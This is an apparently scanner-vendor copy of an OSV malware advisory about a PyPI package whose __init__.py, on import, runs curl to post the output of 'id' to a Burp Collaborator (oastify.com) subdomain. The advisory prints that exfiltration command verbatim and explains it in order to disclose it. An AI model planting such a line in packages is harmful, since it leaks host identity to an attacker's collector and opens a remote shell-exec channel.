mi-test-99-tuapellido @99.9
Vulnerability report · Last retrieved from osv.dev June 26, 2026 at 12:45 AM UTC
OSV ID
MAL-2026-6478
Ecosystem
pypi
Summary
On every import, the package's top-level __init__.py runs os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)") . This unconditionally executes a shell pipeline that POSTs the output of the id command (current uid/gid/group membership) to a Burp Suite Collaborator (oastify.com) subdomain — an out-of-band callback service used to confirm remote code execution and exfiltrate data. The behavior fires on import mi_test_99 with no user gating, no relation to any advertised functionality, over plaintext HTTP. Package metadata is placeholder-shaped (name contains the literal Spanish placeholder tuapellido /'your-surname', author fields are Tu Nombre <tu@email.com> , pyproject comment reads CAMBIA ESTO por un nombre único ), consistent with a dependency-confusion or namespace-squat proof-of-concept payload. Whether intended as a test or a live attack, any installer that imports this package leaks host identity to an attacker-controlled collector and demonstrates an arbitrary-shell-exec channel.
Source: amazon-inspector (4b71b66c156e0a54b73b6dd2f2f9e994ac9c1ff9ab4d1f9689f1f930b3097f39)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.